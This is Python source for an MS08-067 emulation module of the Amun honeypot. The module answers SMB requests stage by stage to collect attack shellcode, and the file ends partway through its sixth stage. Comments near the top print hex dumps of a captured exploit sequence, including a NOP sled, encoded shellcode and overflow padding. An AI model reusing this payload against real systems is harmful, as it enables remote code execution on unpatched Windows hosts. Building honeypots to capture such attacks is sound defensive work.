"""
[Amun - low interaction honeypot]
Copyright (C) [2008]  [Jan Goebel]

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
"""

import psyco ; psyco.full()
from psyco.classes import *

import struct
import random
import ms08067_shellcodes

import amun_logging

### Modul to analyze new vulnerabilities, get everything send to a port and send it to shellcode_manager

class vuln:
	def __init__(self):
		try:
			self.vuln_name = "MS08067 Vulnerability"
			self.stage = "MS08067_STAGE1"
			self.welcome_message = ""
			self.shellcode = []
		except KeyboardInterrupt:
			raise

	def print_message(self, data):
		print "\n"
		counter = 1
		for byte in data:
			if counter==16:
				ausg = hex(struct.unpack("B",byte)[0])
				if len(ausg) == 3:
					list = str(ausg).split("x")
					ausg = "%sx0%s" % (list[0],list[1])
					print ausg
				else:
					print ausg
				counter = 0
			else:
				ausg = hex(struct.unpack("B",byte)[0])
				if len(ausg) == 3:
					list = str(ausg).split("x")
					ausg = "%sx0%s" % (list[0],list[1])
					print ausg,
				else:
					print ausg,
			counter += 1
		print "\n>> Incoming Codesize: %s\n\n" % (len(data))

	def getVulnName(self):
		return self.vuln_name

	def getCurrentStage(self):
		return self.stage

	def getWelcomeMessage(self):
		return self.welcome_message

	def incoming(self, message, bytes, ip, vuLogger, random_reply):
		try:
			self.log_obj = amun_logging.amun_logging("vuln_analyzer", vuLogger)

			### construct standard reply
			#self.reply = random_reply
			self.reply = []
			for i in range(0,400):
				try:
					self.reply.append( struct.pack("B", 0) )
				except KeyboardInterrupt:
					raise

			### SMB Negotiate Request
			### 0x00 0x00 0x00 0x2f 0xff 0x53 0x4d 0x42 0x72 0x00 0x00 0x00 0x00 0x00 0x00 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xcf 0x6b
			### 0x00 0x00 0x00 0x00 0x00 0x0c 0x00 0x02 0x4e 0x54 0x20 0x4c 0x4d 0x20 0x30 0x2e
			### 0x31 0x32 0x00
			
			### SMB Setup and X Request
			### 0x00 0x00 0x00 0x4b 0xff 0x53 0x4d 0x42 0x73 0x00 0x00 0x00 0x00 0x08 0x00 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xff 0xff 0x49 0x68
			### 0x00 0x00 0x00 0x00 0x0d 0xff 0x00 0x00 0x00 0xff 0xff 0x02 0x00 0x49 0x68 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x0e
			### 0x00 0x00 0x00 0x70 0x6f 0x73 0x69 0x78 0x00 0x70 0x79 0x73 0x6d 0x62 0x00

			### incoming setup x request
			### 0x00 0x00 0x00 0x49 0xff 0x53 0x4d 0x42 0x73 0x00 0x00 0x00 0x00 0x00 0x00 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x5c 0x02
			### 0x00 0x00 0x00 0x00 0x0d 0xff 0x00 0x00 0x00 0xff 0xff 0x02 0x00 0x5c 0x02 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x0b
			### 0x00 0x00 0x00 0x4e 0x54 0x00 0x4c 0x41 0x4e 0x4d 0x41 0x4e 0x00

			### Tree Connect AndX Request
			### 0x00 0x00 0x00 0x44 0xff 0x53 0x4d 0x42 0x75 0x00 0x00 0x00 0x00 0x08 0x00 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xff 0xff 0xfa 0x0d
			### 0x00 0x08 0x00 0x00 0x04 0xff 0x00 0x00 0x00 0x00 0x00 0x01 0x00 0x19 0x00 0x00
			### 0x5c 0x5c 0x2a 0x53 0x4d 0x42 0x53 0x45 0x52 0x56 0x45 0x52 0x5c 0x49 0x50 0x43
			### 0x24 0x00 0x3f 0x3f 0x3f 0x3f 0x3f 0x00

			### NT Create User
			### 0x00 0x00 0x00 0x5c 0xff 0x53 0x4d 0x42 0xa2 0x00 0x00 0x00 0x00 0x18 0x01 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xff 0xff 0x64 0x10
			### 0x00 0x08 0x00 0x00 0x18 0xff 0x00 0x00 0x00 0x00 0x08 0x00 0x16 0x00 0x00 0x00
			### 0x00 0x00 0x00 0x00 0x9f 0x01 0x02 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
			### 0x00 0x00 0x00 0x00 0x03 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x40 0x00 0x00 0x00
			### 0x02 0x00 0x00 0x00 0x03 0x09 0x00 0x5c 0x62 0x72 0x6f 0x77 0x73 0x65 0x72 0x00

			### bind call (trans)
			### 0x00 0x00 0x00 0x92 0xff 0x53 0x4d 0x42 0x25 0x00 0x00 0x00 0x00 0x08 0x01 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xff 0xff 0x83 0x14
			### 0x00 0x08 0x00 0x00 0x10 0x00 0x00 0x48 0x00 0x00 0x04 0xe0 0xff 0x00 0x00 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x4a 0x00 0x48 0x00 0x4a 0x00 0x02
			### 0x00 0x26 0x00 0x08 0x40 0x4f 0x00 0x5c 0x50 0x49 0x50 0x45 0x5c 0x00 0x05 0x00
			### 0x0b 0x03 0x10 0x00 0x00 0x00 0x48 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0xb8 0x10
			### 0xb8 0x10 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x00 0x00 0x01 0x00 0xc8 0x4f
			### 0x32 0x4b 0x70 0x16 0xd3 0x01 0x12 0x78 0x5a 0x47 0xbf 0x6e 0xe1 0x88 0x03 0x00
			### 0x00 0x00 0x04 0x5d 0x88 0x8a 0xeb 0x1c 0xc9 0x11 0x9f 0xe8 0x08 0x00 0x2b 0x10
			### 0x48 0x60 0x02 0x00 0x00 0x00

			### shellcode
			### 0x00 0x00 0x02 0xa6 0xff 0x53 0x4d 0x42 0x25 0x00 0x00 0x00 0x00 0x08 0x01 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xff 0xff 0xe3 0x16
			### 0x00 0x08 0x00 0x00 0x10 0x00 0x00 0x5c 0x02 0x00 0x04 0xe0 0xff 0x00 0x00 0x00
			### 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x4a 0x00 0x5c 0x02 0x4a 0x00 0x02
			### 0x00 0x26 0x00 0x08 0x40 0x63 0x02 0x5c 0x50 0x49 0x50 0x45 0x5c 0x00 0x05 0x00
			### 0x00 0x03 0x10 0x00 0x00 0x00 0x5c 0x02 0x00 0x00 0x01 0x00 0x00 0x00 0x44 0x02
			### 0x00 0x00 0x00 0x00 0x1f 0x00 0x01 0x00 0x00 0x00 0xd6 0x00 0x00 0x00 0x00 0x00
			### 0x00 0x00 0xd6 0x00 0x00 0x00 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
			### 0x90 0x90 0x90 0x90 0x90 0x90 0x29 0xc9 0x83 0xe9 0xb0 0xe8 0xff 0xff 0xff 0xff
			### 0xc0 0x5e 0x81 0x76 0x0e 0xe9 0x4a 0xb6 0xa9 0x83 0xee 0xfc 0xe2 0xf4 0x15 0x20
			### 0x5d 0xe4 0x01 0xb3 0x49 0x56 0x16 0x2a 0x3d 0xc5 0xcd 0x6e 0x3d 0xec 0xd5 0xc1
			### 0xca 0xac 0x91 0x4b 0x59 0x22 0xa6 0x52 0x3d 0xf6 0xc9 0x4b 0x5d 0xe0 0x62 0x7e
			### 0x3d 0xa8 0x07 0x7b 0x76 0x30 0x45 0xce 0x76 0xdd 0xee 0x8b 0x7c 0xa4 0xe8 0x88
			### 0x5d 0x5d 0xd2 0x1e 0x92 0x81 0x9c 0xaf 0x3d 0xf6 0xcd 0x4b 0x5d 0xcf 0x62 0x46
			### 0xfd 0x22 0xb6 0x56 0xb7 0x42 0xea 0x66 0x3d 0x20 0x85 0x6e 0xaa 0xc8 0x2a 0x7b
			### 0x6d 0xcd 0x62 0x09 0x86 0x22 0xa9 0x46 0x3d 0xd9 0xf5 0xe7 0x3d 0xe9 0xe1 0x14
			### 0xde 0x27 0xa7 0x44 0x5a 0xf9 0x16 0x9c 0xd0 0xfa 0x8f 0x22 0x85 0x9b 0x81 0x3d
			### 0xc5 0x9b 0xb6 0x1e 0x49 0x79 0x81 0x81 0x5b 0x55 0xd2 0x1a 0x49 0x7f 0xb6 0xc3
			### 0x53 0xcf 0x68 0xa7 0xbe 0xab 0xbc 0x20 0xb4 0x56 0x39 0x22 0x6f 0xa0 0x1c 0xe7
			### 0xe1 0x56 0x3f 0x19 0xe5 0xfa 0xba 0x19 0xf5 0xfa 0xaa 0x19 0x49 0x79 0x8f 0x22
			### 0xa7 0xf5 0x8f 0x19 0x3f 0x48 0x7c 0x22 0x12 0xb3 0x99 0x8d 0xe1 0x56 0x3f 0x20
			### 0xa6 0xf8 0xbc 0xb5 0x66 0xc1 0x4d 0xe7 0x98 0x40 0xbe 0xb5 0x60 0xfa 0xbc 0xb5
			### 0x66 0xc1 0x0c 0x03 0x30 0xe0 0xbe 0xb5 0x60 0xf9 0xbd 0x1e 0xe3 0x56 0x39 0xd9
			### 0xde 0x4e 0x90 0x8c 0xcf 0xfe 0x16 0x9c 0xe3 0x56 0x39 0x2c 0xdc 0xcd 0x8f 0x22
			### 0xd5 0xc4 0x60 0xaf 0xdc 0xf9 0xb0 0x63 0x7a 0x20 0x0e 0x20 0xf2 0x20 0x0b 0x7b
			### 0x76 0x5a 0x43 0xb4 0xf4 0x84 0x17 0x08 0x9a 0x3a 0x64 0x30 0x8e 0x02 0x42 0xe1
			### 0xde 0xdb 0x17 0xf9 0xa0 0x56 0x9c 0x0e 0x49 0x7f 0xb2 0x1d 0xe4 0xf8 0xb8 0x1b
			### 0xdc 0xa8 0xb8 0x1b 0xe3 0xf8 0x16 0x9a 0xde 0x04 0x30 0x4f 0x78 0xfa 0x16 0x9c
			### 0xdc 0x56 0x16 0x7d 0x49 0x79 0x62 0x1d 0x4a 0x2a 0x2d 0x2e 0x49 0x7f 0xbb 0xb5
			### 0x66 0xc1 0x19 0xc0 0xb2 0xf6 0xba 0xb5 0x60 0x56 0x39 0x4a 0xb6 0xa9 0x41 0x41
			### 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
			### 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
			### 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
			### 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x00 0x00
			### 0x00 0x00 0x2f 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x2f 0x00 0x00 0x00 0x41 0x00
			### 0x5c 0x00 0x2e 0x00 0x2e 0x00 0x5c 0x00 0x2e 0x00 0x2e 0x00 0x5c 0x00 0x41 0x41
			### 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
			### 0x2f 0x68 0x18 0x00 0x8b 0xc4 0x66 0x05 0x94 0x04 0x8b 0x00 0xff 0xe0 0x43 0x43
			### 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43
			### 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43
			### 0x43 0x43 0x43 0x43 0x43 0x43 0xeb 0xcc 0x00 0x00 0x00 0x00 0x00 0x00 0x02 0x00
			### 0x00 0x00 0x02 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00 0x5c 0x00
			### 0x00 0x00 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00


			### prepare default resultSet
			resultSet = {}
			resultSet["vulnname"] = self.vuln_name
			resultSet["accept"] = False
			resultSet["result"] = False
			resultSet["shutdown"] = False
			resultSet["reply"] = "None"
			resultSet["stage"] = self.stage
			resultSet["shellcode"] = "None"
			resultSet["isFile"] = False

			### preprocess
			if message[8]=='\xa2' and bytes!=95:
				self.stage = "MS08067_STAGE7"
			#elif message[8]=='\x2e' and bytes==63:
			#	self.stage = "MS08067_STAGE9"
			elif message[8]=='\x2f' and bytes!=68:
				self.stage = "MS08067_STAGE8"

			self.shellcode.append(message)

			if self.stage == "MS08067_STAGE1" and (bytes==51 or bytes==88):
				if message[8]!='\x72':
					return resultSet
				print ".::[Amun - MS08-067 STAGE1] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
				#print message
				#print ">> Request:"
				#self.print_message(message)
				#print [message]
				resultSet["result"] = True
				resultSet["accept"] = True
				### netbios header
				self.reply[0] = "\x00"
				self.reply[1] = "\x00"
				self.reply[2] = "\x00"
				### size - 4 kuerzer
				self.reply[3] = "\x57"
				### ff
				self.reply[4] = "\xff"
				## SMB
				self.reply[5] = "\x53"
				self.reply[6] = "\x4d"
				self.reply[7] = "\x42"
				### command (dialect name)
				self.reply[8] = "\x72"
				### error class
				self.reply[9] = "\x00"
				### reserved
				self.reply[10] = "\x00"
				### error code
				self.reply[11] = "\x00"
				self.reply[12] = "\x00"
				### flag
				self.reply[13] = "\x98"
				### flag2
				self.reply[14] = "\x01"
				self.reply[15] = "\x28"
				### extra
				self.reply[16] = "\x00"
				self.reply[17] = "\x00"
				self.reply[18] = "\x00"
				self.reply[19] = "\x00"
				self.reply[20] = "\x00"
				self.reply[21] = "\x00"
				self.reply[22] = "\x00"
				self.reply[23] = "\x00"
				self.reply[24] = "\x00"
				self.reply[25] = "\x00"
				self.reply[26] = "\x00"
				self.reply[27] = "\x00"
				### tree ID
				self.reply[28] = "\x00"
				self.reply[29] = "\x00"
				### pid
				self.reply[30] = message[30]
				self.reply[31] = message[31]
				### uid
				self.reply[32] = "\x00"
				self.reply[33] = "\x00"
				### mid
				self.reply[34] = message[34]
				self.reply[35] = message[35]
				### word count
				self.reply[36] = "\x11"
				###### parameter block
				### dialect
				self.reply[37] = "\x03"
				self.reply[38] = "\x00"
				### securityMode
				self.reply[39] = "\x01"
				### max mpx count
				self.reply[40] = "\x0a"
				self.reply[41] = "\x00"
				### max vcs
				self.reply[42] = "\x01"
				self.reply[43] = "\x00"
				### max buffer size
				self.reply[44] = "\x04"
				self.reply[45] = "\x11"
				self.reply[46] = "\x00"
				self.reply[47] = "\x00"
				### max raw
				self.reply[48] = "\x00"
				self.reply[49] = "\x00"
				self.reply[50] = "\x01"
				self.reply[51] = "\x00"
				### session key
				self.reply[52] = "\x00"
				self.reply[53] = "\x00"
				self.reply[54] = "\x00"
				self.reply[55] = "\x00"
				### capabilities
				self.reply[56] = "\xfd"
				self.reply[57] = "\xe3"
				self.reply[58] = "\x00"
				self.reply[59] = "\x80"
				### system time high
				self.reply[60] = "\xb2"
				self.reply[61] = "\xbf"
				self.reply[62] = "\x45"
				self.reply[63] = "\xc0"
				self.reply[64] = "\x79"
				self.reply[65] = "\x3e"
				self.reply[66] = "\xc9"
				self.reply[67] = "\x01"
				### server time zone
				self.reply[68] = "\x20"
				self.reply[69] = "\xfe"
				### encryptedkey lenght
				self.reply[70] = "\x00"
				### byte count
				self.reply[71] = "\x10"
				self.reply[72] = "\x00"
				### server guid
				self.reply[73] = "\xc8"
				self.reply[74] = "\x4c"
				self.reply[75] = "\x2a"
				self.reply[76] = "\xe6"
				self.reply[77] = "\xf2"
				self.reply[78] = "\xad"
				self.reply[79] = "\xda"
				self.reply[80] = "\x4e"
				self.reply[81] = "\x98"
				self.reply[82] = "\xad"
				self.reply[83] = "\xce"
				self.reply[84] = "\x47"
				self.reply[85] = "\x69"
				self.reply[86] = "\x80"
				self.reply[87] = "\x97"
				self.reply[88] = "\x76"

				#print "<< Response:"
				#self.print_message(self.reply[:79])
				resultSet['reply'] = "".join(self.reply[:89])
				self.stage = "MS08067_STAGE2"
				return resultSet
			elif self.stage == "MS08067_STAGE2" and (bytes==79 or bytes==77 or bytes==189):
				print ".::[Amun - MS08-067 STAGE2] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
				#print ">> Request:"
				#self.print_message(message)
				#print [message]
				resultSet["result"] = True
				resultSet["accept"] = True
				### netbios header
				self.reply[0] = "\x00"
				self.reply[1] = "\x00"
				self.reply[2] = "\x01"
				### size -4
				self.reply[3] = "\x2e"
				### smb header
				self.reply[4] = "\xff"
				self.reply[5] = "\x53"
				self.reply[6] = "\x4d"
				self.reply[7] = "\x42"
				### command (dialect name)
				self.reply[8] = "\x73"
				### error class
				self.reply[9] = "\x16"
				### reserved
				self.reply[10] = "\x00"
				### error code
				self.reply[11] = "\x00"
				self.reply[12] = "\xc0"
				### flag
				self.reply[13] = "\x98"
				### flag2
				self.reply[14] = "\x01"
				self.reply[15] = "\x68"
				### extra
				self.reply[16] = "\x00"
				self.reply[17] = "\x00"
				self.reply[18] = "\x00"
				self.reply[19] = "\x00"
				self.reply[20] = "\x00"
				self.reply[21] = "\x00"
				self.reply[22] = "\x00"
				self.reply[23] = "\x00"
				self.reply[24] = "\x00"
				self.reply[25] = "\x00"
				self.reply[26] = "\x00"
				self.reply[27] = "\x00"
				### tree ID
				self.reply[28] = "\x00"
				self.reply[29] = "\x00"
				### pid
				self.reply[30] = message[30]
				self.reply[31] = message[31]
				### uid
				self.reply[32] = "\x01"
				self.reply[33] = "\x08"
				### mid
				self.reply[34] = message[34]
				self.reply[35] = message[35]
				### word count
				self.reply[36] = "\x04"
				###### parameter block
				### andxcommand
				self.reply[37] = "\xff"
				### reserved
				self.reply[38] = "\x00"
				### anxoffset
				self.reply[39] = "\x3b"
				self.reply[40] = "\x01"
				### action
				self.reply[41] = "\x00"
				self.reply[42] = "\x00"
				### security blob length
				self.reply[43] = "\xeb"
				self.reply[44] = "\x00"
				### byte count
				self.reply[45] = "\x10"
				self.reply[46] = "\x01"
				###
				self.reply[47:281] = "\xa1\x81\xe80\x81\xe5\xa0\x03\n\x01\x01\xa1\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xa2\x81\xcf\x04\x81\xccNTLMSSP\x00\x02\x00\x00\x00\x18\x00\x18\x008\x00\x00\x00\x05\x02\x8a\x02\xbb\xdf\xa0`>U\x0e\xba\x00\x00\x00\x00\x00\x00\x00\x00|\x00|\x00P\x00\x00\x00\x05\x01(\n\x00\x00\x00\x0fT\x00K\x00S\x00-\x00A\x00T\x00T\x00A\x00C\x00K\x00E\x00R\x00\x02\x00\x18\x00T\x00K\x00S\x00-\x00A\x00T\x00T\x00A\x00C\x00K\x00E\x00R\x00\x01\x00\x18\x00T\x00K\x00S\x00-\x00A\x00T\x00T\x00A\x00C\x00K\x00E\x00R\x00\x04\x00\x18\x00t\x00k\x00s\x00-\x00a\x00t\x00t\x00a\x00c\x00k\x00e\x00r\x00\x03\x00\x18\x00t\x00k\x00s\x00-\x00a\x00t\x00t\x00a\x00c\x00k\x00e\x00r\x00\x06\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00"
				self.reply[281] = "\x57" # W
				self.reply[282] = "\x69" # i
				self.reply[283] = "\x6e" # n
				self.reply[284] = "\x64" # d 
				self.reply[285] = "\x6f" # o
				self.reply[286] = "\x77" # w
				self.reply[287] = "\x73" # s
				self.reply[289] = "\x20" #
				self.reply[290] = "\x35" # 5
				self.reply[291] = "\x2e" # .
				self.reply[292] = "\x31" # 1
				self.reply[293] = "\x00"
				self.reply[294] = "\x57" # W
				self.reply[295] = "\x4f" # O
				self.reply[296] = "\x52" # R
				self.reply[297] = "\x4b" # K
				self.reply[298] = "\x47" # G
				self.reply[299] = "\x52" # R
				self.reply[300] = "\x4f" # O
				self.reply[301] = "\x55" # U
				self.reply[302] = "\x50" # P
				self.reply[303] = "\x00"
				###

				resultSet['reply'] = "".join(self.reply[0:304])
				#print "<< Response:"
				#self.print_message(self.reply[:101])
				#print ["".join(self.reply[:90])]
				self.stage = "MS08067_STAGE3"
				return resultSet
			elif self.stage == "MS08067_STAGE3" and (bytes==72 or bytes==273):
				print ".::[Amun - MS08-067 STAGE3] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
				resultSet["result"] = True
				resultSet["accept"] = True
				#print ">> Request:"
				#self.print_message(message)
				### netbios header
				self.reply[0] = "\x00"
				self.reply[1] = "\x00"
				self.reply[2] = "\x00"
				### size -4
				self.reply[3] = "\x25"
				### smb header
				self.reply[4] = "\xff"
				self.reply[5] = "\x53"
				self.reply[6] = "\x4d"
				self.reply[7] = "\x42"
				### command (dialect name)
				self.reply[8] = "\x73"
				### error class
				self.reply[9] = "\x6d"
				### reserved
				self.reply[10] = "\x00"
				### error code
				self.reply[11] = "\x00"
				self.reply[12] = "\x0c"
				### flag
				self.reply[13] = "\x98"
				### flag2
				self.reply[14] = "\x01"
				self.reply[15] = "\x68"
				### extra
				self.reply[16] = "\x00"
				self.reply[17] = "\x00"
				self.reply[18] = "\x00"
				self.reply[19] = "\x00"
				self.reply[20] = "\x00"
				self.reply[21] = "\x00"
				self.reply[22] = "\x00"
				self.reply[23] = "\x00"
				self.reply[24] = "\x00"
				self.reply[25] = "\x00"
				self.reply[26] = "\x00"
				self.reply[27] = "\x00"
				### tree ID
				self.reply[28] = "\x00"
				self.reply[29] = "\x00"
				### pid
				self.reply[30] = message[30]
				self.reply[31] = message[31]
				### uid
				self.reply[32] = "\x01"
				self.reply[33] = "\x08"
				### mid
				self.reply[34] = message[34]
				self.reply[35] = message[35]
				### word count
				self.reply[36] = "\x00"
				### byte count
				self.reply[37] = "\x00"
				self.reply[38] = "\x00"
				
				resultSet['reply'] = "".join(self.reply[:39])
				self.stage = "MS08067_STAGE4"
				return resultSet
			elif self.stage == "MS08067_STAGE4" and (bytes==96 or bytes==111):
				print ".::[Amun - MS08-067 STAGE4] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
				#print ">> Request:"
				#self.print_message(message)
				resultSet["result"] = True
				resultSet["accept"] = True
				### netbios header
				self.reply[0] = "\x00"
				self.reply[1] = "\x00"
				self.reply[2] = "\x00"
				### size -4
				self.reply[3] = "\x5a"
				### smb header
				self.reply[4] = "\xff"
				self.reply[5] = "\x53"
				self.reply[6] = "\x4d"
				self.reply[7] = "\x42"
				### command (dialect name)
				self.reply[8] = "\x73"
				### error class
				self.reply[9] = "\x00"
				### reserved
				self.reply[10] = "\x00"
				### error code
				self.reply[11] = "\x00"
				self.reply[12] = "\x00"
				### flag
				self.reply[13] = "\x98"
				### flag2
				self.reply[14] = "\x01"
				self.reply[15] = "\x20"
				### extra
				self.reply[16] = "\x00"
				self.reply[17] = "\x00"
				self.reply[18] = "\x00"
				self.reply[19] = "\x00"
				self.reply[20] = "\x00"
				self.reply[21] = "\x00"
				self.reply[22] = "\x00"
				self.reply[23] = "\x00"
				self.reply[24] = "\x00"
				self.reply[25] = "\x00"
				self.reply[26] = "\x00"
				self.reply[27] = "\x00"
				### tree ID
				self.reply[28] = "\x00"
				self.reply[29] = "\x00"
				### pid
				self.reply[30] = message[30]
				self.reply[31] = message[31]
				### uid
				self.reply[32] = "\x01"
				self.reply[33] = "\x08"
				### mid
				self.reply[34] = message[34]
				self.reply[35] = message[35]
				### word count
				self.reply[36] = "\x03"
				###### parameter block
				### andxcommand
				self.reply[37] = "\xff"
				### reserved
				self.reply[38] = "\x00"
				### anxoffset
				self.reply[39] = "\x58"
				self.reply[40] = "\x00"
				### action
				self.reply[41] = "\x00"
				self.reply[42] = "\x00"
				### byte count
				self.reply[43] = "\x2f"
				self.reply[44] = "\x00"
				### native os
				self.reply[45] = "\x57" # W
				self.reply[46] = "\x69" # i
				self.reply[47] = "\x6e" # n
				self.reply[48] = "\x64" # d 
				self.reply[49] = "\x6f" # o
				self.reply[50] = "\x77" # w
				self.reply[51] = "\x73" # s
				self.reply[52] = "\x20" #
				self.reply[53] = "\x35" # 5
				self.reply[54] = "\x2e" # .
				self.reply[55] = "\x31" # 1
				self.reply[56] = "\x00"
				### native lan manager
				self.reply[57] = "\x57" # W
				self.reply[58] = "\x69" # i
				self.reply[59] = "\x6e" # n
				self.reply[60] = "\x64" # d 
				self.reply[61] = "\x6f" # o
				self.reply[62] = "\x77" # w
				self.reply[63] = "\x73" # s
				self.reply[64] = "\x20" #
				self.reply[65] = "\x32" # 2
				self.reply[66] = "\x30" # 0
				self.reply[67] = "\x30" # 0
				self.reply[68] = "\x30" # 0 
				self.reply[69] = "\x20" # 
				self.reply[70] = "\x4c" # L
				self.reply[71] = "\x41" # A
				self.reply[72] = "\x4e" # N
				self.reply[73] = "\x20" # 
				self.reply[74] = "\x4d" # M
				self.reply[75] = "\x61" # a
				self.reply[76] = "\x6e" # n 
				self.reply[77] = "\x61" # a
				self.reply[78] = "\x67" # g
				self.reply[79] = "\x65" # e
				self.reply[80] = "\x72" # r
				self.reply[81] = "\x20"
				### primary domain
				self.reply[82] = "\x57" # W
				self.reply[83] = "\x4f" # O
				self.reply[84] = "\x52" # R
				self.reply[85] = "\x4b" # K
				self.reply[86] = "\x47" # G
				self.reply[87] = "\x52" # R
				self.reply[88] = "\x4f" # O
				self.reply[89] = "\x55" # U
				self.reply[90] = "\x50" # P
				self.reply[91] = "\x00"
				###

				resultSet['reply'] = "".join(self.reply[:92])
				self.stage = "MS08067_STAGE5"
				return resultSet
			elif self.stage == "MS08067_STAGE5" and (bytes==150 or bytes==71):
				print ".::[Amun - MS08-067 STAGE5] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
				#print ">> Request:"
				#self.print_message(message)
				resultSet["result"] = True
				resultSet["accept"] = True
				### netbios header
				self.reply[0] = "\x00"
				self.reply[1] = "\x00"
				self.reply[2] = "\x00"
				### size -4
				self.reply[3] = "\x30"
				### smb header
				self.reply[4] = "\xff"
				self.reply[5] = "\x53"
				self.reply[6] = "\x4d"
				self.reply[7] = "\x42"
				### command (dialect name)
				self.reply[8] = "\x75"
				### error class
				self.reply[9] = "\x00"
				### reserved
				self.reply[10] = "\x00"
				### error code
				self.reply[11] = "\x00"
				self.reply[12] = "\x00"
				### flag
				self.reply[13] = "\x98"
				### flag2
				self.reply[14] = "\x01"
				self.reply[15] = "\x20"
				### extra
				self.reply[16] = "\x00"
				self.reply[17] = "\x00"
				self.reply[18] = "\x00"
				self.reply[19] = "\x00"
				self.reply[20] = "\x00"
				self.reply[21] = "\x00"
				self.reply[22] = "\x00"
				self.reply[23] = "\x00"
				self.reply[24] = "\x00"
				self.reply[25] = "\x00"
				self.reply[26] = "\x00"
				self.reply[27] = "\x00"
				### tree ID
				self.reply[28] = "\x00"
				self.reply[29] = "\x08"
				### pid
				self.reply[30] = message[30]
				self.reply[31] = message[31]
				### uid
				self.reply[32] = "\x01"
				self.reply[33] = "\x08"
				### mid
				self.reply[34] = message[34]
				self.reply[35] = message[35]
				### word count
				self.reply[36] = "\x03"
				### andx command
				self.reply[37] = "\xff"
				### reserved
				self.reply[38] = "\x00"
				### andx offset
				self.reply[39] = "\x2e"
				self.reply[40] = "\x00"
				### optional support
				self.reply[41] = "\x01"
				self.reply[42] = "\x00"
				### byte count
				self.reply[43] = "\x05"
				self.reply[44] = "\x00"
				### service
				self.reply[45] = "\x49"
				self.reply[46] = "\x50"
				self.reply[47] = "\x43"
				self.reply[48] = "\x00"
				### native filesystem
				self.reply[49] = "\x00"
				###

				resultSet['reply'] = "".join(self.reply[:50])
				self.stage = "MS08067_STAGE6"
				return resultSet
			elif self.stage == "MS08067_STAGE6" and bytes==95:
				print ".::[Amun - MS08-067 STAGE6] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
				#print ">> Request:"
				#self.print_message(message)
				resultSet["result"] = True
				resultSet["accept"] = True
				### netbios header
				self.reply[0] = "\x00"
				self.reply[1] = "\x00"
				self.reply[2] = "\x00"
				### size -4
				self.reply[3] = "\x25"
				### smb header
				self.reply[4] = "\xff"
				self.reply[5] = "\x53"
				self.reply[6] = "\x4d"
				self.reply[7] = "\x42"
				### command (dialect name)
				self.reply[8] = "\xa2"
				### error class
				self.reply[9] = "\x22"
				### reserved
				self.reply[10] = "\x00"
				### error code
				self.reply[11] = "\x00"
				self.reply[12] = "\xc0"
				### flag
				self.reply[13] = "\x98"
				### flag2
				self.reply[14] = "\x01"
				self.reply[15] = "\x60"
				### extra
				self.reply[16] = "\x00"
				self.reply[17] = "\x00"
				self.reply[18] = "\x00"
				self.reply[19] = "\x00"
				self.reply[20] = "\x00"
				self.reply[21] = "\x00"
				self.reply[22] = "\x00"
				self.reply[23] = "\x00"
				self.reply[24] = "\x00"
				self.reply[25] = "\x00"
				self.reply[26] = "\x00"
				self.reply[27] = "\x00"
				### tree ID
				self.reply[28] = "\x00"
				self.reply[29] = "\x08"
				### pid
				self.reply[30] = message[30]
				self.reply[31] = message[31]
				### uid
				self.reply[32] = "\x01"
				self.reply[33] = "\x08"
				### mid
				self.reply[34] = message[34]
				self.reply[35] = message[35]
